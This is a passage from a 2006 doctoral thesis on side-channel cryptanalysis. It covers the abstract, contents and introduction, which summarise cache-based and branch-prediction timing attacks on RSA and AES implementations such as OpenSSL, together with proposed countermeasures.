Document 11914504

advertisement
AN ABSTRACT OF THE THESIS OF
Onur Acıiçmez for the degree of Doctor of Philosophy in
Electrical and Computer Engineering presented on December 08, 2006.
Title: Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks
Abstract approved:
Çetin Kaya Koç
Cryptographic devices leak timing and power consumption information
that is easily measurable, radiation of various levels, and more. Such devices also
have additional inputs, other than plaintext and keys, like voltage, which can be
modified to force the device to produce certain faulty outputs that can be used to
reveal the secret key. Side-channel cryptanalysis uses the information that leaks
through one or more side channels of a cryptographic system to obtain secret
information.
The initial focus of side-channel research was on smart card security. There
are two main reasons why smart cards were the first type of devices that was
analyzed extensively from the side-channel point of view. Smart cards store secret
values inside the card and they are especially designed to protect and process these
secret values. Therefore, there is a serious financial gain involved in cracking
smart cards, as well as, analyzing them and developing more secure smart card
technologies. The recent promises from Trusted Computing community indicate
the security assurance of storing such secret values in PC platforms, c.f. [99].
These promises have made the side-channel analysis of PC platforms as desirable
as that of smart cards.
The second reason of the high attention to side-channel analysis of smart
cards is due to the ease of applying such attacks to them. The measurements
of side-channel information on smart cards are almost “noiseless”, which makes
such attacks very practical. On the other hand, there are many factors that affect
such measurements on real commodity computer systems. These factors create
noise, and therefore it is much more difficult to develop and perform successful
attacks on such “real” computers within our daily life. Thus, until very recently
the vulnerability of systems even running on servers was not “really” considered
to be harmful by such side-channel attacks. This was changed with the work of
Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a
local network.
Because of the above reasons, we have seen an increased research effort on
the security analysis of the daily life PC platforms from the side-channel point of
view. Here, it has been especially shown that the functionality of the common
components of processor architectures creates an indisputable security risk, c.f. [1,
2, 5, 14, 73, 80], which comes in different forms.
In this thesis, we focus on side-channel cryptanalysis of cryptosystems on
commodity computer platforms. Especially, we analyze two main CPU components, cache and branch prediction unit, from side-channel point of view. We
show that the functionalities of these two components create very serious security
risks in software systems, especially in software based cryptosystems.
c
Copyright by Onur Acıiçmez
December 08, 2006
All Rights Reserved
Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks
by
Onur Acıiçmez
A THESIS
submitted to
Oregon State University
in partial fulfillment of
the requirements for the
degree of
Doctor of Philosophy
Presented December 08, 2006
Commencement June 2007
Doctor of Philosophy thesis of Onur Acıiçmez presented on December 08, 2006
APPROVED:
Major Professor, representing Electrical and Computer Engineering
Director of the School of Electrical Engineering and Computer Science
Dean of the Graduate School
I understand that my thesis will become part of the permanent collection of Oregon
State University libraries. My signature below authorizes release of my thesis to
any reader upon request.
Onur Acıiçmez, Author
ACKNOWLEDGMENTS
I wish to express my most sincere gratitude to my major professor, Dr.
Çetin Kaya Koç, who recognized my potential, sparked my interest in this particular topic, and guided me throughout the development of this work.
I would like to give my special thanks to Dr. Werner Schindler and Dr.
Jean-Pierre Seifert for introducing me to the challenging field of Side-Channel
Cryptanalysis, and especially for their guidance in conducting this research and
producing the papers which formed a basis for this thesis.
I also thank Dr. Bella Bose, Dr. Timothy Budd, Dr. Ben Lee, Dr. Lien
Mei and Dr. Oksana Ostroverkhova for dedicating their time to participate in my
Ph.D. committee.
The most special thanks go to my parents for both their financial and emotional supports throughout my entire education. I would also like to acknowledge
so many dearest friends, most of whom I have known for more than 20 years, for
their encouragements to pursue my graduate education in USA. I apologize for
being unable to list each and every one of those precious individuals in this page.
Thanks also to my colleagues in Information Security Laboratory for their
general support and being such good friends.
Onur Acıiçmez
Hillsboro, Oregon, December 2006
TABLE OF CONTENTS
Page
1
INTRODUCTION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
1.1
Overview of Side-Channel Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
1.2
The Importance of Side-Channel Analysis on Computer Systems . . .
5
1.3
New Side-Channel Sources on Processors: MicroArchitectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
Summary of Our Contributions to the Field . . . . . . . . . . . . . . . . . . . . . . .
8
1.4.1 Chapter 3: Remote Timing Attack on RSA . . . . . . . . . . . . .
9
1.4.2 Chapter 4: Survey on Cache Attacks . . . . . . . . . . . . . . . . . . .
9
1.4
1.4.3 Chapter 5: Cache Based Remote Timing Attack on the AES 10
1.4.4 Chapter 6: Trace-Driven Cache Attacks on AES . . . . . . . . . . 10
1.4.5 Chapter 7: Predicting Secret Keys via Branch Prediction . . . 10
1.4.6 Chapter 8: On the Power of Simple Branch Prediction Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2
BACKGROUND . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.1
Basics of RSA and Its Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.1.1 Overview of RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.1.2 Exponentiation Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . 15
2.1.2.1 Binary Square-and-Multiply Exponentiation Algorithm . 15
2.1.2.2 b-ary Square-and-Multiply Exponentiation Algorithm . . 15
2.1.2.3 Sliding Window Exponentiation . . . . . . . . . . . . . . . . . . . 16
2.1.2.4 Balanced Montgomery Powering Ladder . . . . . . . . . . . . . 16
2.1.3 Montgomery Multiplication . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.1.4 Chinese Remainder Theorem . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.2
Basics of AES and Its Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2.1 Overview of AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
TABLE OF CONTENTS (Continued)
Page
2.2.2 AES Software Implementations . . . . . . . . . . . . . . . . . . . . . . . 23
2.3
Basics of Computer Microarchitecture: Cache and Branch Prediction 25
2.3.1 Processor Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
2.3.2 Branch Prediction Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
3
REMOTE TIMING ATTACK ON RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
3.1
General Idea of a Timing Attack on RSA-CRT . . . . . . . . . . . . . . . . . . . . 33
3.2
Overview of Brumley and Boneh Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
3.3
Details of Our Approach. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3.4
Implementation Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
3.5
Experimental Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
3.5.1 Comparison of our attack and BB-attack . . . . . . . . . . . . . . . 47
3.5.2 The details of our attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
3.5.2.1 The distribution of time differences . . . . . . . . . . . . . . . . 49
3.5.2.2 Error probabilities and the parameters . . . . . . . . . . . . . . 50
3.6
4
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
SURVEY ON CACHE ATTACKS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
4.1
The Basics of a Cache Attack. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
4.1.1 Basic Attack Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
4.1.1.1 Model-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
4.1.1.2 Model-2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
4.2
Cache Attacks in the Literature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
4.2.1 Theoretical Attack of D. Page . . . . . . . . . . . . . . . . . . . . . . . . 64
TABLE OF CONTENTS (Continued)
Page
4.2.2 First Practical Implementations . . . . . . . . . . . . . . . . . . . . . . 66
4.2.3 Bernstein’s Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
4.2.4 Percival’s Hyper-Threading Attack on RSA . . . . . . . . . . . . . 67
4.2.5 Osvik-Shamir-Tromer (OST) Attacks . . . . . . . . . . . . . . . . . . 68
4.2.6 Last Round Access-Driven Attack . . . . . . . . . . . . . . . . . . . . . 69
4.2.7 Cache-based Power Attack on AES from Bertoni et al. . . . . . 70
4.2.8 Lauradoux’s Power Attack on AES . . . . . . . . . . . . . . . . . . . . 71
4.2.9 Internal Cache Collision Attacks by Bonneau et al. . . . . . . . . 71
4.2.10 Overview of Our Cache Attacks . . . . . . . . . . . . . . . . . . . . . . 71
5
CACHE BASED REMOTE TIMING ATTACK ON THE AES . . . . . . . . . . 74
5.1
The Underlying Principal of Devising a Remote Cache Attack . . . . . 75
5.2
Details of Our Basic Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
5.2.1 First Round Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
5.2.2 Second Round Attack – Basic Variant . . . . . . . . . . . . . . . . . . 79
5.3
A More Efficient, Universally Applicable Attack . . . . . . . . . . . . . . . . . . . 80
5.3.1 Comparison with the basic second round attack from Subsect 5.2.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
6
5.4
Experimental Details and Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
5.5
Scaling the Sample Size N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
5.6
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
TRACE-DRIVEN CACHE ATTACKS ON AES . . . . . . . . . . . . . . . . . . . . . . . . . 92
6.1
Overview of Trace-Driven Cache Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . 92
TABLE OF CONTENTS (Continued)
Page
6.2
Trace-Driven Cache Attacks on the AES . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
6.2.1 Overview of an Ideal Two-Round Attack . . . . . . . . . . . . . . . 96
6.2.2 Overview of an Ideal Last Round Attack . . . . . . . . . . . . . . . 98
6.2.3 Complications in Reality and Actual Attack Scenarios . . . . . 100
6.2.4 Further Details of Our Attacks . . . . . . . . . . . . . . . . . . . . . . . 101
6.3
Analysis of the Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
6.3.1 Our Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
6.3.2 Trade-off Between Online and Offline Cost . . . . . . . . . . . . . . 106
7
6.4
Experimental Details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
6.5
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
PREDICTING SECRET KEYS VIA BRANCH PREDICTION . . . . . . . . . 111
7.1
Outlines of Various Attack Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
7.1.1 Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
7.1.1.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 116
7.1.2 Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
7.1.2.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 119
7.1.3 Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
7.1.3.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 120
7.1.4 Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
7.1.4.1 Examples of vulnerable systems. . . . . . . . . . . . . . . . . . . . 122
TABLE OF CONTENTS (Continued)
Page
7.2
Practical Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
7.2.1 Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . 123
7.2.2 Results for Attack 4 = Trace-driven Attack against the BTB
(Asynchronous Attack) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
7.3
8
9
Conclusions and recommendations for further research . . . . . . . . . . . . . 129
ON THE POWER OF SIMPLE BRANCH PREDICTION ANALYSIS . . 132
8.1
Multi-Threading, spy and crypto processes. . . . . . . . . . . . . . . . . . . . . . . . . 134
8.2
Improving Trace-driven Attacks against the BTB . . . . . . . . . . . . . . . . . . 136
8.3
Practical Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
8.4
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142
CONCLUSION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
BIBLIOGRAPHY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
LIST OF FIGURES
Figure
Page
2.1
Binary version of Square-and-Multiply Exponentiation Algorithm . . . 16
2.2
b-ary version of Square-and-Multiply Exponentiation Algorithm . . . . . 17
2.3
Sliding Window Exponentiation Algorithm . . . . . . . . . . . . . . . . . . . . . 18
2.4
Balanced Montgomery Powering Ladder . . . . . . . . . . . . . . . . . . . . . . . 19
2.5
Montgomery Multiplication Algorithm . . . . . . . . . . . . . . . . . . . . . . . . 21
2.6
RSA with CRT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.7
Round operations in AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
2.8
Branch Prediction Unit Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.1
Modular Exponentiation with Montgomery’s Algorithm . . . . . . . . . . . 34
3.2
The distribution of ∆j in terms of clock cycles for 0 ≤ j ≤ 5000,
sorted in descending order, for the sample bit q61 . The graph on the
left shows this distribution when q61 = 1. The distribution on the
right is observed when q61 = 0. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.1
Cache Attack Model-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
4.2
Cache states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
4.3
Two different accesses to the same table. . . . . . . . . . . . . . . . . . . . . . . . 62
4.4
DES S-Box lookup. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
6.1
Figure.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
6.2
Figure.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
6.3
Figure.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
7.1
Practical results when using the total eviction method in attack principle 2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
7.2
Practical results when using the single eviction method in attack principle 2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
7.3
Increasing gap between multiplication and squaring steps due to missing BTB entries. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
LIST OF FIGURES (Continued)
Figure
Page
7.4
Connecting the spy-induced BTB misses and the square/multiply cycle gap. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
8.1
Front-End Instruction Pipeline Stages feeding the µop Queue . . . . . . . 137
8.2
Results of SBPA with an improved resolution. . . . . . . . . . . . . . . . . . . . 141
8.3
Enhancing a bad resolution via independent repetition. . . . . . . . . . . . 143
8.4
Best result of our SBPA against openSSL RSA, yielding 508 out of
512 secret key bits. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
LIST OF TABLES
Table
Page
3.1
The configuration used in the experiments . . . . . . . . . . . . . . . . . . . . . 45
3.2
Average ∆ and ∆BB values and 0-1 gaps. The values are given in
terms of clock cycles. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
3.3
The percentage of the majority of time differences that are either
positive or negative (empirical values) . . . . . . . . . . . . . . . . . . . . . . . . . 50
3.4
Columns 2 and 3 show the parameters that can be used to yield the
intended accuracy. The last columns give the expected number of
steps for Nmax = ∞, calculated using Formula (3.11), to reach the
target difference D. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
7.1
The configuration used in the experiments . . . . . . . . . . . . . . . . . . . . . 124
Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks
1. INTRODUCTION
Information security has always been a concern of human race. Even the
ancient civilizations developed such methods that are the first examples of encryption algorithms. The advances in security fields, including cryptography,
affected almost every aspect of human life and science. For example, the first
programmable Turing machine, which can be considered as the first computer
ever built even before ENIAC, was engineered to break cryptosystems like Enigma
[104, 45]. The increasing importance of information technologies like electronic
devices, personal computers, and of course the Internet in daily life has broadened
the range and the need of information security. As an eventual result, the security
related applications have gained even more popularity and become a fundamental
and indispensable part of information systems.
The mentioned reasons triggered the transition of the responsibility to
handle security critical applications from mainframe computers and custom-built
devices to widely used and high-volume manufactured general commodity electronics including personal computers, servers, handheld devices and smart cards.
This transition also mandates a revision of how we design and analyze security
systems by identifying, developing, and adapting new security requirements and
threat models. The sole purpose of this thesis is to contribute to this revision
process. We identify some components of commodity computers as novel and unforseen security risks. Our findings have significant value for processor vendors,
software developers, system designers, security architects, cryptographers, and es-
2
pecially for ongoing secure platform development efforts (c.f. [99]) in the sense
that they bring new security requirements and threat models that must be considered during secure microprocessor design, system and software development,
and cryptosystem design.
The identification of requirements for secure execution environments has
always been a challenging task since the invention of high complexity computing
devices. The security requirements of early computer systems were defined with
monolithic mainframe computers in mind (c.f. [106, 13, 32] and also [46] for a nice
collection of early computer security efforts). Today, the domination of multiuser
PC and server platforms and also the multitasking operating systems mandates a
serious revision of these early requirements. Recently, we have seen an increased
effort on the security analysis of daily life computer platforms. The advances
in the field, more specifically, the desire to develop secure execution technologies
such as Intel’s Virtualization Technology (VT) and Trusted Execution Technology
(TXT) (codenamed LeGrande Technology or LT for short), play an important role
to increase attention on analysis of computer platform security due to [99]. Here,
it has been especially shown that microarchitectural properties of modern CPU’s
creates a significant security risk, (c.f. [5, 1, 2, 14, 72, 73, 80]). In this thesis, we
analyze two main CPU components, cache and branch prediction unit, from sidechannel point of view. We show that the functionalities of these two components
create v ery serious security risks in software systems, especially in software based
cryptosystems.
Cryptosystems have traditionally been analyzed as perfect mathematical
objects. In those analyses, the cipher under examination is considered as a black
box that realizes a mapping from the input values (plaintext and secret key) to
an output (ciphertext). The security of a cipher is determined by analyzing its
3
mathematical description via formal and statistical methods. Therefore, conventional cryptography only deals with the mathematical model of the cryptosystems.
However, any practical implementation of a cryptosystem causes the leakage of
sensitive information due to the compulsory characteristics of the physical devices,
which are ignored in the security models of conventional cryptography.
Side-channel analysis, which is a relatively new area of applied cryptography, tries to fill in this gap between the theory of conventional cryptography
and the actual physical situations of real world. Cryptographic devices leak timing and power consumption information that is easily measurable, radiation of
various levels, and more. Such devices also have additional inputs, other than
plaintext and keys, like voltage, which can be modified to force the device to produce certain faulty outputs that can be used to reveal the secret key. Side-channel
cryptanalysis uses the information that leaks through one or more side channels
of a cryptographic system to obtain secret information. It would be unrealistic to
explain all the aspects of side-channel cryptanalysis in this document, hence we
will give only a brief overview in Section 1.1.
1.1. Overview of Side-Channel Analysis
Side channels of a cryptosystem include, but not restricted to, power consumption, execution time, and electromagnetic emanation. In other words, the
secret key of a carelessly designed cryptographic device can be obtained by tracing
the power consumption, electromagnetic emanation, and/or the execution time of
the device.
An attacker can learn about the processes that occur inside a cryptosystem and gain invaluable information about the secret key by analyzing the power
4
consumption of the system during encryption/decryption. Integrated circuits are
built out of individual transistors acting as voltage-controlled switches. The motion of electrical charge through these transistors consumes power and produces
electromagnetic radiation, both of which are externally detectable.
Side-channel attacks, including power analysis attacks, have two typical
phases: data collection and data analysis. Data collection involves sampling a
device’s side-channel information, i.e., the power consumption or electromagnetic
emanation as a function of time. In this phase, a sample of cryptographic operations, which are executed under the same key, are inspected. The next phase
involves the analysis of the collected data and extracting information about the
key.
There are mainly two types of power analysis known in the literature: Simple Power Analysis (SPA) and Differential Power Analysis (DPA). SPA attacks
involve direct interpretation of power consumption measurements collected during
cryptographic computations. The sequence of performed operations determines
the amount of power consumed by an electronic device. SPA attacks rely on observing the power consumption traces of an active device and these observations
can reveal the sequence of operations executed in that device during a cryptographic computation. The operation sequences of some cipher implementations
can directly be translated into the value of the secret key. DPA attacks are more
powerful than SPA attacks, and they are harder to prevent. While SPA attacks
use visual inspection to identify power fluctuations, DPA attacks use sophisticated
statistical analysis and error-correction techniques to extract information about
the secret key.
The principles of Simple Power Analysis (SPA) and Differential Power
Analysis (DPA) rely on the power consumption variations that are generated as a
5
consequence of varying sequences of operations executed depending on the values
of plaintext inputs and the secret key. Similarly, Simple Electromagnetic Analysis
(SEMA) and Differential Electromagnetic Analysis (DEMA) allow retrieving the
key using the same concept as well, except that they use electromagnetic radiation
measurements instead of power consumption.
In this paper, we mainly focus on a specific type of side-channel attack,
called timing attacks, that uses the execution time of cryptographic devices to
reveal the secret data. In a timing attack, the adversary observes the running time
of a cryptosystem for different inputs and compromises the secret key using this
time behavior. Timing attacks are based on the fact that certain cryptosystems
take different amounts of time to process different inputs.
So far, typical targets of side-channel attacks have been smart cards. The
side-channel analysis of computer systems attracted much less attention compared
to smart cards. The main reasons of this trend are explained in Section 1.2. However, due to the recent advances in the security area, side-channel analysis of
computer systems has recently gained significant importance. Moreover, it has
been realized that some of the components of modern computer microarchitectures leak certain side-channel information and thus create unforeseen security
risks, c.f. [5, 1, 2, 73, 14, 80]. In this thesis, we tackle this particular problem and
contribute to the field via identification, analysis, and mitigation of microarchitectural side-channel vulnerabilities.
1.2. The Importance of Side-Channel Analysis on Computer Systems
Side-channel cryptanalysis has attracted very significant attention since
Kocher’s discoveries of timing and power analysis attacks [59, 60]. He showed that
6
cryptographic implementations leak sensitive information because of the physical
properties and requirements of the devices the systems are implemented on. The
classical cryptography, which analyzes the cryptosystems as perfect mathematical
objects and ignores the physical analysis of the implementations, fails to identify
such side-channel leakages. Therefore it is inevitable to utilize both classical
cryptography and side-channel cryptanalysis in order to develop and implement
secure systems.
The initial focus of side-channel research was on smart card security. A
smart card is a standard credit card-sized plastic token with an embedded microchip that makes it “smart”. They are used for identification or financial transactions and therefore need built-in security features. The clock signal and the
electrical power are among the inputs taken from outside in today’s smart cards.
Hence, the power consumption and the execution time of a smart card are very
easy to measure with almost no noise. This property of smart cards makes them
more vulnerable to side-channel attacks than computer systems.
The security community has more or less a clear picture of what the sidechannel vulnerabilities of smart cards are, what the threat models are, and how
to mitigate side-channel attacks on smart cards. There are two main reasons why
smart cards were the first type of devices that was analyzed extensively from the
side-channel point of view. Smart cards store secret values inside the card and they
are especially designed to protect and process these secret values. Therefore, there
is a serious financial gain involved in cracking smart cards, as well as, analyzing
them and developing more secure smart card technologies. The recent promises
from Trusted Computing community indicate the security assurance of storing
such secret values in PC platforms, c.f. [99]. These promises have made the sidechannel analysis of PC platforms as desirable as that of smart cards.
7
The second reason of the high attention to side-channel analysis of smart
cards is due to the ease of applying such attacks to them. The measurements
of side-channel information on smart cards are almost “noiseless”, which makes
such attacks very practical. On the other hand, there are many factors that affect
such measurements on real commodity computer systems. These factors create
noise, and therefore it is much more difficult to develop and perform successful
attacks on such “real” computers within our daily life. Thus, until very recently
the vulnerability of systems even running on servers was not “really” considered
to be harmful by such side-channel attacks. This was changed with the work of
Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a
local network. They simply adapted the attack principle as introduced in [85] to
show that side-channel attacks are a real danger not only to smart cards but also
to widely used computer systems.
1.3. New Side-Channel Sources on Processors: MicroArchitectural Attacks
Because of the above reasons, we have seen an increased research effort on
the security analysis of the daily life PC platforms from the side-channel point of
view. Here, it has been especially shown that the functionality of the common
components of processor architectures creates an indisputable security risk, c.f. [1,
2, 5, 14, 73, 80], which comes in different forms. Although the cache itself has
been known for a long time being a crucial security risk of modern CPU’s, c.f.
[95, 48], [5, 14, 73, 80] were the first proving such vulnerabilities practically and
raised large public interest in such vulnerabilities. These advances initiated a new
research vector to identify, analyze, and mitigate the security vulnerabilities that
are created by the design and implementation of processor components.
8
Especially in the light of ongoing Trusted Computing efforts, cf. [99], which
promise to turn the commodity PC platform into a trustworthy platform, c.f. also
[25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC
platforms are of particular interest. This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far.
Even more interesting is the fact that all of the above pure software side channel
attacks also allow a totally unprivileged process to attack other processes running
in parallel on the same processor (or even remote), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This
particularly means that side channel attacks render all of the sophisticated protection mechanisms as for (e.g.) described in [42, 103] as useless. The simple reason
for the failure of these trust mechanisms is that the new side-channel attacks
simply exploit deeper processor ingredients — i.e., below the trust architecture
boundary, c.f. [81, 42].
We define MicroArchitectural Side-Channel Attacks as the attacks that
exploit the side-channel leakage due to the microarchitectural properties of microprocessors. So far, we have seen two types of microarchitectural attacks, cache
and branch prediction analysis, which are discussed in detail in this thesis.
1.4. Summary of Our Contributions to the Field
In this document, we present the details of our works in MicroArchitectural
Side-Channel Analysis area. We also give an overview of the first remote timing
attack on computers, i.e., Brumley and Boneh Attack [21], and propose certain
improvements over this original attack.
9
The following subsections summarize our contributions and also the content
of this thesis.
1.4.1. Chapter 3: Remote Timing Attack on RSA
Since the remarkable work of Kocher [59], several papers considering different types of timing attacks have been published. In 2003, Brumley and Boneh
presented a timing attack on unprotected OpenSSL implementations [21]. In this
chapter, we discuss how to improve the efficiency of their attack by a factor of
more than 10. We exploit the timing behavior of Montgomery multiplications in
the table initialization phase, which allows us to increase the number of multiplications that provide useful information to reveal one of the prime factors of RSA
moduli. We also present other improvements, which can be applied to the attack
in [21].
1.4.2. Chapter 4: Survey on Cache Attacks
This chapter gives a nice overview of current cache-based side-channel attacks in the literature. We first describe two different attack models that constitute the basis of various cache-based attacks. Then we discuss the details of each
cache attack seperately. We omit the details of our own attacks in this chapter,
since they are discussed in depth in the following chapters.
10
1.4.3. Chapter 5: Cache Based Remote Timing Attack on the
AES
We introduce a new robust cache-based timing attack on AES. We present
experiments and concrete evidence that our attack can be used to obtain secret
keys of remote cryptosystems if the server under attack runs on a multitasking
or simultaneous multithreading system with a large enough workload. This is an
important difference to recent cache-based timing attacks as these attacks either
did not provide any supporting experimental results indicating if they can be
applied remotely, or they are not realistically remote attacks.
1.4.4. Chapter 6: Trace-Driven Cache Attacks on AES
In this chapter, we present efficient trace-driven cache attacks on a widely
used implementation of the AES cryptosystem. We also evaluate the cost of
the proposed attacks in detail under the assumption of a noiseless environment.
We develop an accurate mathematical model that we use in the cost analysis
of our attacks. We use two different metrics, specifically, the expected number
of necessary traces and the cost of the analysis phase, for the cost evaluation
purposes. Each of these metrics represents the cost of a different phase of the
attack.
1.4.5. Chapter 7: Predicting Secret Keys via Branch Prediction
This chapter announces a new software side-channel attack — enabled by
the branch prediction capability common to all modern high-performance CPUs.
The penalty paid (extra clock cycles) for a mispredicted branch can be used for
11
cryptanalysis of cryptographic primitives that employ a data-dependent program
flow. Analogous to the recently described cache-based side-channel attacks our
attacks also allow an unprivileged process to attack other processes running in
parallel on the same processor, despite sophisticated partitioning methods such
as memory protection, sandboxing or even virtualization. In this chapter, we
discuss several such attacks for the example of RSA, and experimentally show
their applicability to real systems, such as OpenSSL and Linux. Moreover, we
also demonstrate the strength of the branch prediction side-channel attack by
rendering the obvious countermeasure in this context (Montgomery Multiplication
with dummy-reduction) as useless. Although the deeper consequences of the latter
result make the task of writing an efficient and secure modular exponentiation (or
scalar multiplication on an elliptic curve) a challenging task, we eventually suggest
some countermeasures to mitigate branch prediction side-channel attacks.
1.4.6. Chapter 8: On the Power of Simple Branch Prediction
Analysis
Very recently, we have discovered a new software side-channel attack, called
Branch Prediction Analysis (BPA) attack, and also demonstrated their practicality on popular commodity PC platforms. While the above recent attack still had
the flavor of a classical timing attack against RSA, where one uses many executiontime measurements under the same key in order to statistically amplify some small
but key-dependent timing differences, we dramatically improve upon the former
result. We prove that a carefully written spy-process running simultaneously with
an RSA-process, is able to collect during one single RSA signing execution almost
all of the secret key bits. We call such an attack, analyzing the CPU’s Branch
Predictor states through spying on a single quasi-parallel computation process,
12
a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it
from those one relying on statistical methods and requiring many computation
measurements under the same key.
The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so called randomization techniques to protect RSA against
side-channel attacks are, in the context of SBPA attacks, totally useless. Additional to that very crucial security implication, targeted at such implementations
which are assumed to be at least statistically secure, our successful SBPA attack
also bears another equally critical security implication. Namely, in the context
of simple side-channel attacks, it is widely believed that equally balancing the
operations after branches is a secure countermeasure against such simple attacks.
Unfortunately, this is not true, as even such “balanced branch” implementations
can be completely broken by our SBPA attacks. Moreover, despite sophisticated
hardware-assisted partitioning methods such as memory protection, sandboxing
